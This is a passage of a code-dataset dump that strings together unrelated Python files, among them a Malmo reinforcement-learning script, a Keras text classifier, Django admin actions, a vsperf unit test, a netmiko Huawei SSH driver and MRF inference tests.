'wb') as handle:\n pickle.dump(book_keeping, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\ndef load_gep(savefile_name, book_keeping_name):\n with open(savefile_name, 'rb') as handle:\n gep,starting_iteration = pickle.load(handle)\n with open(book_keeping_name, 'rb') as handle:\n b_k = pickle.load(handle)\n return gep, starting_iteration, b_k\n\ndef run_episode(policy_params):\n obs = malmo.start_mission()\n # Loop until mission/episode ends:\n state = -1\n for command_nb in range(total_allowed_actions):\n # extract the world state that will be given to the agent's policy\n state = get_state(obs)\n actions = param_policy.forward(state.reshape(1,-1), policy_params)\n # allowed to climb stairs only if at least 2 bread were recovered\n #print(state)\n #nb_bread_recovered = sum(state[-5:])\n #print('recov_b: %s' % nb_bread_recovered)\n #if state[1] >= 4.3 and nb_bread_recovered < 2:\n # print('access to stairs forbiddin, not enough dough pal')\n # #acions[0] = 0\n env_actions = [\"move \"+str(actions[0]), \"strafe \"+str(actions[1])]\n obs, done = malmo.step(env_actions)\n\n if command_nb == total_allowed_actions - 1: # end of episode\n #last cmd, must teleport to avoid weird glitch with minecart environment\n _, done = malmo.step([\"tp 293 7 433.5\"])\n # send final outcome\n outcome = get_outcome(state)\n break\n return outcome, state\n\n\n# evaluate model over given goals in [-1,1], returns errors for each sub space\ndef eval(agent_pos_goals, cart_x_goals, breads_goals):\n agent_goals_range = range(len(agent_pos_goals))\n cart_goals_range = range(len(agent_pos_goals),len(agent_pos_goals)+len(cart_x_goals))\n breads_goals_range = range(len(agent_pos_goals)+len(cart_x_goals),len(agent_pos_goals)+len(cart_x_goals)+len(breads_goals))\n all_goals = agent_pos_goals.tolist() + cart_x_goals.tolist() + breads_goals.tolist()\n #print(all_goals)\n agent_errors = []\n cart_errors = []\n breads_errors = []\n cart_touched = []\n\n for i,goal in enumerate(all_goals):\n print(\"########### Evaluation Iteration # %s ##########\" % (i))\n goal = np.array(goal)\n # generate exploitation policy using gep (NN exploitation)\n goal_range = None\n if i in agent_goals_range:\n #print('agent')\n goal_range = [0,1,2]\n elif i in cart_goals_range:\n #print('cart')\n goal_range = [3]\n elif i in breads_goals_range:\n #print('breads')\n goal_range = [4]\n else:\n raise NotImplementedError\n policy_params = gep.produce(normalized_goal=goal,goal_range=goal_range)\n outcome, _ = run_episode(policy_params)\n #print('result: %s' % outcome[goal_range])\n # normalize outcome\n outcome = scale_vector(outcome, np.array(full_outcome_bounds))\n\n #print('goal was {}'.format(unscale_vector(goal, np.array(full_outcome_bounds)[goal_range])))\n sub_outcome = outcome[goal_range]\n error = np.abs(sub_outcome - goal)\n\n # add error\n if i in agent_goals_range:\n agent_errors.append(np.sum(error) / 3.)\n elif i in cart_goals_range:\n cart_errors.append(error[0])\n #print(sub_outcome)\n if sub_outcome != scale_vector([291.5],np.array(b.get_bounds(['cart_x']))):\n #print('touched')\n cart_touched.append(1)\n else:\n #print('not touched')\n cart_touched.append(0)\n elif i in breads_goals_range:\n breads_errors.append(error[0])\n else:\n raise NotImplementedError\n return np.mean(agent_errors), np.mean(cart_errors), np.mean(breads_errors), cart_touched\n\n\n\n\n\n################################ MAIN #####################\n\n# define and parse argument values\n# more info here: 
https://stackoverflow.com/questions/5423381/checking-if-sys-argvx-is-defined\narg_names = ['command','experiment_name','model_type','nb_iters','nb_bootstrap','explo_noise','server_port','interest_step']\nargs = dict(zip(arg_names, sys.argv))\nArg_list = collections.namedtuple('Arg_list', arg_names)\nargs = Arg_list(*(args.get(arg, None) for arg in arg_names))\n\n\n# define variable's bounds for policy input and outcome \nb = Bounds()\nb.add('agent_x',[288.3,294.7])\nb.add('agent_y',[4,6])\nb.add('agent_z',[433.3,443.7])\nb.add('agent_vx',[-1,1]) \nb.add('agent_vy',[-1,1])\nb.add('agent_vz',[-1,1])\nb.add('cart_x',[285,297])\nb.add('cart_vx',[-1,1])\nfor i in range(len(bread_positions)):\n b.add('bread_'+str(i),[0,1])\n# add meta variable\nb.add('breads',[0,len(bread_positions)])\n\nprint(\"variable bounds :\")\nprint(b.bounds)\n\n################# INIT LEARNING AGENT #####################\n# full outcome space is [agent_x, agent_y, agent_z, cart_x, nb_bread_recovered]\n# possible models: [\"random_modular\", \"random_flat\", \"active_modular\",]\n\nexperiment_name = args.experiment_name if args.experiment_name else \"default\"\nsavefile_name = experiment_name+\"_save.pickle\"\nbook_keeping_file_name = experiment_name+\"_bk.pickle\"\nsave_step = 200\nplot_step = 100000\n#eval_step = 200\n\n# init neural network policy\ninput_names = ['agent_x','agent_y','agent_z','agent_vx','agent_vy','agent_vz',\n 'cart_x', 'cart_vx'] + ['bread_'+str(i) for i in range(len(bread_positions))]\ninput_bounds = b.get_bounds(input_names)\nprint('input_bounds: %s' % input_bounds) \nhidden_layer_size = 64\ninput_size = len(input_bounds)\naction_set_size = 2\nparam_policy = Simple_NN(input_size, input_bounds, action_set_size , hidden_layer_size)\n\n# init goal exploration process\nfull_outcome = ['agent_x','agent_y','agent_z','cart_x', 'breads']\nfull_outcome_bounds = b.get_bounds(full_outcome)\n\nexploration_noise = float(args.explo_noise) if args.explo_noise else 0.10\nnb_bootstrap = int(args.nb_bootstrap) if args.nb_bootstrap else 1000\nmodel_babbling_mode = \"random\"\ntotal_policy_params = hidden_layer_size*input_size + hidden_layer_size*action_set_size\n\nif args.model_type == \"random_flat\":\n outcome1 = full_outcome\n config = {'policy_nb_dims': total_policy_params,\n 'total_outcome_range': len(full_outcome) , #agent x y z pos, minecart x pos and number of recovered bread\n 'full_outcome_bounds': np.array(full_outcome_bounds),\n 'modules':{'mod1':{'outcome_bounds': np.array(b.get_bounds(outcome1)),\n 'outcome_range': np.array([full_outcome.index(var) for var in outcome1])}}}\nelif (args.model_type == \"random_modular\") or (args.model_type == \"active_modular\"):\n outcome1 = ['agent_x','agent_y','agent_z']\n outcome2 = ['cart_x']\n outcome3 = ['breads']\n config = {'policy_nb_dims': total_policy_params,\n 'total_outcome_range': len(full_outcome) , #agent x y z pos, minecart x pos and number of recovered bread\n 'full_outcome_bounds': np.array(full_outcome_bounds),\n 'modules':{'agent_final_pos':{'outcome_bounds':np.array(b.get_bounds(outcome1)),\n 'outcome_range': np.array([full_outcome.index(var) for var in outcome1])},\n 'cart_final_pos':{'outcome_bounds':np.array(b.get_bounds(outcome2)),\n 'outcome_range': np.array([full_outcome.index(var) for var in outcome2])},\n 'bread_final_count':{'outcome_bounds':np.array(b.get_bounds(outcome3)),\n 'outcome_range':np.array([full_outcome.index(var) for var in outcome3])}}}\n if args.model_type == \"active_modular\": model_babbling_mode =\"active\"\nelse:\n raise 
NotImplementedError\n\nmax_iterations = int(args.nb_iters) if args.nb_iters else 20000\n# if a gep save exist, load gep, init it otherwise\nif os.path.isfile(savefile_name):\n gep, starting_iteration, b_k = load_gep(savefile_name, book_keeping_file_name)\n nb_bootstrap = b_k['parameters']['nb_bootstrap']\n np.random.seed(b_k['parameters']['seed'])\n\nelse:\n starting_iteration = 0\n seed = np.random.randint(1000)\n np.random.seed(seed)\n if model_babbling_mode == \"active\":\n gep = GEP(config,\n model_babbling_mode=model_babbling_mode, \n explo_noise=exploration_noise, \n update_interest_step=int(args.interest_step))\n else:\n gep = GEP(config,model_babbling_mode=model_babbling_mode, explo_noise=exploration_noise)\n # init boring book keeping\n b_k = dict()\n b_k['parameters'] = {'model_type':args.model_type,\n 'nb_bootstrap': int(args.nb_bootstrap),\n 'seed': seed,\n 'explo_noise': exploration_noise}\n b_k['final_agent_x_reached'] = []\n b_k['final_agent_z_reached'] = []\n b_k['final_cart_x_reached'] = []\n b_k['final_bread_recovered'] = []\n b_k['choosen_modules'] = []\n b_k['interests'] = dict()\n for i in range(len(bread_positions)):\n b_k['bread_'+str(i)] = []\n #b_k['eval_errors'] = None\n\n# load test set goals\nif os.path.isfile('test_set_goals.pickle'):\n with open('test_set_goals.pickle', 'rb') as handle:\n agent_pos_goals, cart_x_goals, breads_goals = pickle.load(handle)\nelse:\n print(\"TEST SET NOT FOUND: run generate_random_goals script first\")\n#####################################################################\n\nport = int(args.server_port) if args.server_port else 10000\n# init malmo controller\nmalmo = MalmoController(missionXML, port=port, tick_lengths=8, skip_step=1, desired_mission_time=7)\n\nfor i in range(starting_iteration,max_iterations):\n print(\"########### Iteration # %s ##########\" % (i))\n # generate policy using gep\n policy_params = gep.produce(bootstrap=True) if i < nb_bootstrap else gep.produce()\n outcome, last_state = run_episode(policy_params)\n gep.perceive(outcome)\n\n # boring book keeping\n print(outcome[full_outcome.index('agent_x')])\n b_k['final_agent_x_reached'].append(outcome[full_outcome.index('agent_x')])\n b_k['final_agent_z_reached'].append(outcome[full_outcome.index('agent_z')])\n cart_x = outcome[full_outcome.index('cart_x')]\n b_k['final_cart_x_reached'].append(cart_x)\n #if (cart_x >= 296.2) or (cart_x <= 286.8):\n # print(\"KART WAS SWINGED UP CHAMPAIN %s\" % cart_x)\n # print(policy_params)\n # print(\"saving this AMAZING SET OF PARAMETERS, OMG THEY ARE SO GOOD\")\n # with open('policy_that_swinged_up_cart_'+str(i)+'.pickle', 'wb') as handle:\n # pickle.dump(policy_params, handle, protocol=pickle.HIGHEST_PROTOCOL)\n b_k['final_bread_recovered'].append(outcome[full_outcome.index('breads')])\n for k in range(len(bread_positions)):\n b_k['bread_'+str(k)].append(last_state[input_names.index('bread_'+str(k))])\n \n '''\n if ((i+1) % eval_step) == 0:\n e_agent, e_cart, e_breads = eval(agent_pos_goals, cart_x_goals, breads_goals)\n if b_k['eval_errors'] is None:\n b_k['eval_errors'] = [e_agent, e_cart, e_breads]\n else:\n b_k['eval_errors'][0] = np.hstack((b_k['eval_errors'][0],e_agent))\n b_k['eval_errors'][1] = np.hstack((b_k['eval_errors'][1],e_cart))\n b_k['eval_errors'][2] = np.hstack((b_k['eval_errors'][2],e_breads))\n '''\n if ((i+1) % save_step) == 0:\n print(\"saving gep\")\n b_k['choosen_modules'] = gep.choosen_modules\n if model_babbling_mode == \"active\":\n b_k['interests'] = gep.interests\n 
b_k['parameters']['update_interest_step'] = gep.modules['agent_final_pos'].update_interest_step\n save_gep(gep, i+1, b_k, savefile_name, book_keeping_file_name)\n \n if ((i+1) % plot_step) == 0:\n print(\"plotting\")\n #plot_agent_pos_exploration(1, b_k['final_agent_x_reached'], b_k['final_agent_z_reached'])\n #plot_agent_cart_exploration(2, b_k['final_cart_x_reached'])\n #plot_agent_bread_exploration(3, b_k['final_bread_recovered'])\n if model_babbling_mode == \"active\":\n plot_interests(5, gep.interests)\n #plot_eval_errors(4, b_k['eval_errors'])\n plt.show(block=False)\n \n# offline, in depth competence error evaluation\n# load random dataset of goals\n\nif os.path.isfile('test_set_goals.pickle'):\n with open('large_final_test_set_goals_bread_cart.pickle', 'rb') as handle:\n agent_pos_goals, cart_x_goals, breads_goals = pickle.load(handle)\nelse:\n print(\"TEST SET NOT FOUND: run generate_random_goals script first\")\n\nfirst_floor = scale_vector([4.],np.array(b.get_bounds(['agent_y'])))[0]\nsnd_floor = scale_vector([6.],np.array(b.get_bounds(['agent_y'])))[0]\nsnd_floor_limit = scale_vector([440.7],np.array(b.get_bounds(['agent_z'])))[0]\n# clean agent_pos_goals\nfor g in agent_pos_goals:\n print(g)\n if g[2] < snd_floor_limit:\n g[1] = first_floor\n else:\n g[1] = snd_floor\n print('after: %s' % g)\nprint(\"agent goals cleaned up\")\n\n'''\n# final competence test on goals choosen by engineer\nprint(np.array(full_outcome_bounds)[[0,1,2]])\nprint(np.array(full_outcome_bounds)[[3]])\nprint(np.array(full_outcome_bounds)[[4]])\n\nagent_pos_goals = scale_vector(np.array([[294.5,6.,443.5],[288.5,6.,443.5],[293.5,4.,436.3]]),\n np.array(full_outcome_bounds)[[0,1,2]])\ncart_x_goals = scale_vector(np.array([[296.5],[286.5],[294.5]]),\n np.array(full_outcome_bounds)[[3]])\nbreads_goals = scale_vector(np.array([[0.],[1.],[2.],[3.],[4.],[5.]]),\n np.array(full_outcome_bounds)[[4]])\n'''\n\ne_agent, e_cart, e_breads, cart_touched = eval(agent_pos_goals, cart_x_goals, breads_goals)\nb_k['final_eval_errors_bread_cart'] = [e_agent, e_cart, e_breads]\nb_k['final_eval_cart_touched'] = cart_touched\nb_k['hh'] = 'heelo'\nprint(\"saving gep\")\nsave_gep(gep, max_iterations, b_k, savefile_name, book_keeping_file_name)\n\nplt.show()\n","sub_path":"flowers_minecart_old_new.py","file_name":"flowers_minecart_old_new.py","file_ext":"py","file_size_in_byte":20162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"312935545","text":"import pandas as pd\nimport numpy as np\nimport re\nimport sys\nimport jieba\n\ndef load_dataX(path):\n with open(path, 'r', encoding='utf-8') as f:\n readin = f.readlines()\n sentences = []\n for s in readin[1:]:\n s = re.sub('^[0-9]+,', '', s)\n s = s[:-2]\n for same_char in re.findall(r'((\\w)\\2{2,})', s):\n s = s.replace(same_char[0], same_char[1])\n for punct in re.findall(r'(><.-「」【】『』[-/\\\\\\\\()!\"+,&?\\']{2,})',s):\n s = s.replace(punct, punct[0])\n s = re.sub(\"[-「」【】『』] \",\"\",s)\n sentences.append(s)\n return sentences\n\ninputData = sys.argv[1]\ninputDictionary = sys.argv[2]\noutput = sys.argv[3]\njieba.set_dictionary(inputDictionary)\nfrom gensim.models import Word2Vec\nemb_model = Word2Vec.load('emb.model')\n\nsentencesT = load_dataX(inputData)\nsentencesT = [list(jieba.cut(s, cut_all=False)) for s in sentencesT]\nfrom keras.preprocessing.sequence import pad_sequences\ntest_sequences = []\nfor i, s in enumerate(sentencesT):\n toks = []\n for w in s:\n try:\n toks.append(emb_model.wv.vocab[w].index + 1)\n 
except:\n toks.append(0)\n test_sequences.append(toks)\nmax_length = 100\ntest_sequences = pad_sequences(test_sequences, maxlen=max_length)\n\nfrom keras.models import load_model\nmodel = load_model('./model.h5')\ntestY = model.predict(test_sequences)\ntestY[testY >= 0.5] = 1\ntestY[testY < 0.5] = 0\ntestY = np.reshape(testY, 80000)\ntestY = testY.astype(int)\nindex = [i for i in range(0,len(testY))]\noutCsv = pd.DataFrame({'id' : index, 'label' : testY})\noutCsv.to_csv(output, index=0)\n","sub_path":"hw4/hw4_test.py","file_name":"hw4_test.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"106892087","text":"from django.contrib import admin\nfrom django.core import serializers\nfrom django.http import HttpResponse\n\nfrom blogs.models import Blog, Entry, Author\n\n\nclass EntryAdmin(admin.ModelAdmin):\n list_display = ['headline', 'status']\n ordering = ['headline']\n actions = ['make_published', 'delete_selected']\n\n def make_published(self, request, queryset):\n rows_updated = queryset.update(status='p')\n if rows_updated == 1:\n message_bit = '1 entry was'\n else:\n message_bit = '%s entries were' % rows_updated\n self.message_user(request, '%s successfully published!' % message_bit)\n make_published.short_description = 'Publish the selected entries'\n\n\ndef export_selected_objects(modeladmin, request, queryset):\n response = HttpResponse(mimetype=\"text/javascript\")\n serializers.serialize(\"json\", queryset, stream=response)\n return response\n\nadmin.site.register(Blog)\nadmin.site.register(Entry, EntryAdmin)\nadmin.site.register(Author)\n\nadmin.site.add_action(export_selected_objects, 'export_selected')\n\n","sub_path":"part1_poll_site/blogs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499687775","text":"#!/usr/bin/env python\n\n# Copyright 2016 Intel Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Unittest for yardstick.benchmark.scenarios.networking.vsperf.Vsperf\n\nfrom __future__ import absolute_import\ntry:\n from unittest import mock\nexcept ImportError:\n import mock\nimport unittest\n\nfrom yardstick.benchmark.scenarios.networking import vsperf\n\n\n@mock.patch('yardstick.benchmark.scenarios.networking.vsperf.subprocess')\n@mock.patch('yardstick.benchmark.scenarios.networking.vsperf.ssh')\n@mock.patch(\"yardstick.benchmark.scenarios.networking.vsperf.open\",\n mock.mock_open())\nclass VsperfTestCase(unittest.TestCase):\n\n def setUp(self):\n self.ctx = {\n \"host\": {\n \"ip\": \"10.229.47.137\",\n \"user\": \"ubuntu\",\n \"password\": \"ubuntu\",\n },\n }\n self.args = {\n 'options': {\n 'testname': 'p2p_rfc2544_continuous',\n 'traffic_type': 'continuous',\n 'frame_size': '64',\n 'bidirectional': 'True',\n 'iload': 100,\n 'trafficgen_port1': 'eth1',\n 'trafficgen_port2': 'eth3',\n 'external_bridge': 'br-ex',\n 'conf_file': 
'vsperf-yardstick.conf',\n 'setup_script': 'setup_yardstick.sh',\n 'test_params': 'TRAFFICGEN_DURATION=30;',\n },\n 'sla': {\n 'metrics': 'throughput_rx_fps',\n 'throughput_rx_fps': 500000,\n 'action': 'monitor',\n }\n }\n\n def test_vsperf_setup(self, mock_ssh, mock_subprocess):\n p = vsperf.Vsperf(self.args, self.ctx)\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_subprocess.call().execute.return_value = None\n\n p.setup()\n self.assertIsNotNone(p.client)\n self.assertEqual(p.setup_done, True)\n\n def test_vsperf_teardown(self, mock_ssh, mock_subprocess):\n p = vsperf.Vsperf(self.args, self.ctx)\n\n # setup() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_subprocess.call().execute.return_value = None\n\n p.setup()\n self.assertIsNotNone(p.client)\n self.assertEqual(p.setup_done, True)\n\n p.teardown()\n self.assertEqual(p.setup_done, False)\n\n def test_vsperf_run_ok(self, mock_ssh, mock_subprocess):\n p = vsperf.Vsperf(self.args, self.ctx)\n\n # setup() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_subprocess.call().execute.return_value = None\n\n # run() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_ssh.SSH.from_node().execute.return_value = (\n 0, 'throughput_rx_fps\\r\\n14797660.000\\r\\n', '')\n\n result = {}\n p.run(result)\n\n self.assertEqual(result['throughput_rx_fps'], '14797660.000')\n\n def test_vsperf_run_failed_vsperf_execution(self, mock_ssh,\n mock_subprocess):\n p = vsperf.Vsperf(self.args, self.ctx)\n\n # setup() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_subprocess.call().execute.return_value = None\n\n # run() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (1, '', '')\n\n result = {}\n self.assertRaises(RuntimeError, p.run, result)\n\n def test_vsperf_run_failed_csv_report(self, mock_ssh, mock_subprocess):\n p = vsperf.Vsperf(self.args, self.ctx)\n\n # setup() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_subprocess.call().execute.return_value = None\n\n # run() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_ssh.SSH.from_node().execute.return_value = (1, '', '')\n\n result = {}\n self.assertRaises(RuntimeError, p.run, result)\n\n\ndef main():\n unittest.main()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/unit/benchmark/scenarios/networking/test_vsperf.py","file_name":"test_vsperf.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"640131716","text":"from __future__ import print_function\r\nfrom __future__ import unicode_literals\r\nimport time\r\nfrom netmiko.cisco_base_connection import CiscoSSHConnection\r\n\r\n\r\nclass HuaweiSSH(CiscoSSHConnection):\r\n\r\n def session_preparation(self):\r\n \"\"\"Prepare the session after the connection has been established.\"\"\"\r\n self.set_base_prompt()\r\n self.disable_paging(command=\"screen-length 0 temporary\\n\")\r\n\r\n def config_mode(self, config_command='system-view'):\r\n \"\"\"Enter configuration mode.\"\"\"\r\n return super(HuaweiSSH, self).config_mode(config_command=config_command)\r\n\r\n def exit_config_mode(self, exit_config='return'):\r\n \"\"\"Exit configuration mode.\"\"\"\r\n return super(HuaweiSSH, self).exit_config_mode(exit_config=exit_config)\r\n\r\n def check_config_mode(self, check_string=']'):\r\n \"\"\"Checks whether in configuration mode. 
Returns a boolean.\"\"\"\n return super(HuaweiSSH, self).check_config_mode(check_string=check_string)\n\n def set_base_prompt(self, pri_prompt_terminator='>', alt_prompt_terminator=']',\n delay_factor=1):\n '''\n Sets self.base_prompt\n\n Used as delimiter for stripping of trailing prompt in output.\n\n Should be set to something that is general and applies in multiple contexts. For Comware\n this will be the router prompt with < > or [ ] stripped off.\n\n This will be set on logging in, but not when entering system-view\n '''\n debug = False\n if debug:\n print(\"In set_base_prompt\")\n\n delay_factor = self.select_delay_factor(delay_factor)\n self.clear_buffer()\n self.write_channel(\"\\n\")\n time.sleep(.5 * delay_factor)\n\n prompt = self.read_channel()\n prompt = self.normalize_linefeeds(prompt)\n\n # If multiple lines in the output take the last line\n prompt = prompt.split('\\n')[-1]\n prompt = prompt.strip()\n\n # Check that ends with a valid terminator character\n if not prompt[-1] in (pri_prompt_terminator, alt_prompt_terminator):\n raise ValueError(\"Router prompt not found: {0}\".format(prompt))\n\n # Strip off leading and trailing terminator\n prompt = prompt[1:-1]\n prompt = prompt.strip()\n\n self.base_prompt = prompt\n\n if debug:\n print(\"prompt: {}\".format(self.base_prompt))\n\n return self.base_prompt\n","sub_path":"netmiko/huawei/huawei_ssh.py","file_name":"huawei_ssh.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"368297706","text":"import sys\nimport re\n\ntopology = [] # Raw topology information (with BW & Delay)\nneighbours = {} # Dictionary of list of neighbours for each switch\nswitch_cnt = 0 # Total number of switches in topology\nswitch_addr = {} # For active switches\nswitch_active = {} # Keep track if switch alive. 0 = alive, -5 = dead.\nswitch_msg = {} # Queue for messages to be sent to switches\nlink_fails = {}\n\nwith open('network.cfg', 'r') as f:\n\tnum_switches = f.readline()\n\tfor line in f:\n\t\ttopology.append(line.strip().split(' '))\n\nswitch_cnt = int(num_switches)\n\nfor i in range(switch_cnt):\n neighbours[i+1] = []\n\nfor row in topology:\n neighbours[int(row[0])].append(int(row[1]))\n neighbours[int(row[1])].append(int(row[0]))\n\n\n\n\n\n#for i in range(int(num_switches)):\n# print str(i+1) + \": \" + str(neighbours[i+1])\n","sub_path":"topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"72878282","text":"class Pizza:\n def __init__(self, radius, toppings, slices=8):\n self.radius = radius\n self.toppings = toppings\n self.slices_left = slices\n\n def eat_slice(self):\n if self.slices_left > 0:\n self.slices_left -= 1\n else:\n print(\"Oh no! 
Out of pizaa\")\n\n def __repr__(self):\n return '{}\" pizza'.format(self.radius)\n\np = Pizza(14, (\"Pepperoni\", \"Olives\"), slices=12) \nprint(Pizza.eat_slice) # => \n\nprint(p.eat_slice) # => \n\nmethod = p.eat_slice\nprint(method.__self__) # => 14\" Pizza\nprint(method.__func__) # => \n\np.eat_slice() # Implicitly calls Pizza.eat_slice(p)","sub_path":"Lecture05/Exercises/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"651563387","text":"\"\"\"Tests of integration of image loading, learning, and inference\"\"\"\nfrom mrftools import *\nimport numpy as np\nimport unittest\nimport os\nimport matplotlib.pyplot as plt\nimport copy\n\n\nclass TestIntegration(unittest.TestCase):\n \"\"\"Test class to test interface between image loading, learning, and inference\"\"\"\n def test_loading_and_learning(self):\n \"\"\"Test loading of a full image-segmentation training set, learning, and inference.\"\"\"\n loader = ImageLoader(10, 10)\n\n images, models, labels, names = loader.load_all_images_and_labels(os.path.join(os.path.dirname(__file__),\n 'train_data'), 2, 3)\n\n learner = Learner(MatrixBeliefPropagator)\n\n learner.set_regularization(0.0, 0.00001)\n\n for model, states in zip(models, labels):\n learner.add_data(states, model)\n\n d_unary = 65\n num_states = 2\n d_edge = 11\n\n weights = np.zeros(d_unary * num_states + d_edge * num_states**2)\n\n args = {'max_iter': 200}\n\n new_weights = learner.learn(weights, opt_args=args)\n\n unary_mat = new_weights[:d_unary * num_states].reshape((d_unary, num_states))\n pair_mat = new_weights[d_unary * num_states:].reshape((d_edge, num_states**2))\n print(\"Unary weights:\\n\" + repr(unary_mat))\n print(\"Pairwise weights:\\n\" + repr(pair_mat))\n\n # test inference with weights\n\n i = 1\n\n models[i].set_weights(new_weights)\n bp = MatrixBeliefPropagator(models[i])\n bp.infer(display='final')\n bp.load_beliefs()\n\n beliefs = np.zeros((images[i].height, images[i].width))\n label_img = np.zeros((images[i].height, images[i].width))\n errors = 0\n baseline = 0\n\n for x in range(images[i].width):\n for y in range(images[i].height):\n beliefs[y, x] = np.exp(bp.var_beliefs[(x, y)][1])\n label_img[y, x] = labels[i][(x, y)]\n errors += np.abs(labels[i][(x, y)] - np.round(beliefs[y, x]))\n baseline += labels[i][(x, y)]\n\n # # uncomment this to plot the beliefs\n # plt.subplot(131)\n # plt.imshow(images[i], interpolation=\"nearest\")\n # plt.subplot(132)\n # plt.imshow(label_img, interpolation=\"nearest\")\n # plt.subplot(133)\n # plt.imshow(beliefs, interpolation=\"nearest\")\n # plt.show()\n\n print(\"Error rate: %f\" % np.true_divide(errors, images[i].width * images[i].height))\n print(\"Baseline from guessing all background: %f\" % np.true_divide(baseline, images[i].width * images[i].height))\n assert errors < baseline, \"Learned model did no better than guessing all background.\"\n\n def test_consistency(self):\n \"\"\"Test consistency and correctness of inference on an image-segmentation MRF\"\"\"\n loader = ImageLoader(1, 4)\n np.random.seed(0)\n\n images, models, labels, names = loader.load_all_images_and_labels(\n os.path.join(os.path.dirname(__file__), 'train_data'), 2, 1)\n i = 0\n\n d_unary = 65\n num_states = 2\n d_edge = 11\n\n new_weights = 0.1 * np.random.randn(d_unary * num_states + d_edge * num_states ** 2)\n\n models[i].set_weights(new_weights)\n models[i].load_factors_from_matrices()\n\n for inference_type in 
[BeliefPropagator, MatrixBeliefPropagator]:\n\n bp = inference_type(models[i])\n bp.infer(display='full')\n bp.load_beliefs()\n\n bf = BruteForce(models[i])\n\n # check unary marginal agreement with brute force\n for var in sorted(bp.mn.variables):\n unary_belief = np.exp(bp.var_beliefs[var])\n assert np.allclose(np.sum(unary_belief), 1.0), \"Unary belief not normalized\"\n unary_error = np.sum(np.abs(bf.unary_marginal(var) - unary_belief))\n print(\"Unary marginal for %s. Error compared to brute force: %e\" % (repr(var), unary_error))\n assert unary_error < 1e-3, \"Unary error was too large compared to brute force\"\n\n # check pairwise marginal agreement with brute force\n for var in sorted(bp.mn.variables):\n for neighbor in sorted(bp.mn.get_neighbors(var)):\n edge_error = np.sum(\n np.abs(bf.pairwise_marginal(var, neighbor) - np.exp(bp.pair_beliefs[(var, neighbor)])))\n print(\"Pair %s marginal error compared to brute force: %e\" % (repr((var, neighbor)), edge_error))\n assert edge_error < 1e-3, \"Pairwise error was too large compared to brute force\"\n\n # check consistency\n for var in sorted(bp.mn.variables):\n unary_belief = np.exp(bp.var_beliefs[var])\n\n for neighbor in sorted(bp.mn.get_neighbors(var)):\n pair_belief = np.sum(np.exp(bp.pair_beliefs[(var, neighbor)]), 1)\n assert np.allclose(np.sum(pair_belief), 1.0), \"Pair belief not normalized\"\n\n print(pair_belief, unary_belief)\n assert np.allclose(pair_belief, unary_belief), \"unary and pairwise beliefs are inconsistent\"\n\n print(\"Finished and passed tests for \" + repr(inference_type))\n\n def test_belief_propagators(self):\n \"\"\"Compare belief propagator implementations on image-segmentation MRFs\"\"\"\n loader = ImageLoader(4, 4)\n np.random.seed(0)\n\n images, models, labels, names = loader.load_all_images_and_labels(\n os.path.join(os.path.dirname(__file__), 'train_data'), 2, 1)\n i = 0\n\n d_unary = 65\n num_states = 2\n d_edge = 11\n\n new_weights = 0.1 * np.random.randn(d_unary * num_states + d_edge * num_states ** 2)\n\n models[i].set_weights(new_weights)\n models[i].load_factors_from_matrices()\n\n model = models[i]\n\n bp = BeliefPropagator(model)\n bp.load_beliefs()\n\n mat_bp = MatrixBeliefPropagator(model)\n mat_bp.load_beliefs()\n\n for i in range(4):\n for var in sorted(bp.mn.variables):\n for neighbor in sorted(bp.mn.get_neighbors(var)):\n edge = (var, neighbor)\n bp_message = bp.messages[edge]\n\n if edge in mat_bp.mn.message_index:\n edge_index = mat_bp.mn.message_index[edge]\n else:\n edge_index = mat_bp.mn.message_index[(edge[1], edge[0])] + mat_bp.mn.num_edges\n\n mat_bp_message = mat_bp.message_mat[:, edge_index].ravel()\n\n assert np.allclose(bp_message, mat_bp_message), \\\n \"BP and matBP did not agree on message for edge %s in iter %d\" % (repr(edge), i) \\\n + \"\\nBP: \" + repr(bp_message) + \"\\nmatBP: \" + repr(mat_bp_message)\n\n # print \"Message %s is OK\" % repr(edge)\n\n assert np.allclose(bp.pair_beliefs[edge], mat_bp.pair_beliefs[edge]), \\\n \"BP and matBP did not agree on pair beliefs after %d message updates\" % i\n\n assert np.allclose(bp.var_beliefs[var], mat_bp.var_beliefs[var]), \\\n \"BP and matBP did not agree on unary beliefs after %d message updates\" % i\n\n bp.update_messages()\n bp.load_beliefs()\n mat_bp.update_messages()\n mat_bp.load_beliefs()\n\n def test_dual_learner_speed(self):\n \"\"\"Test the speed of inner-dual learner 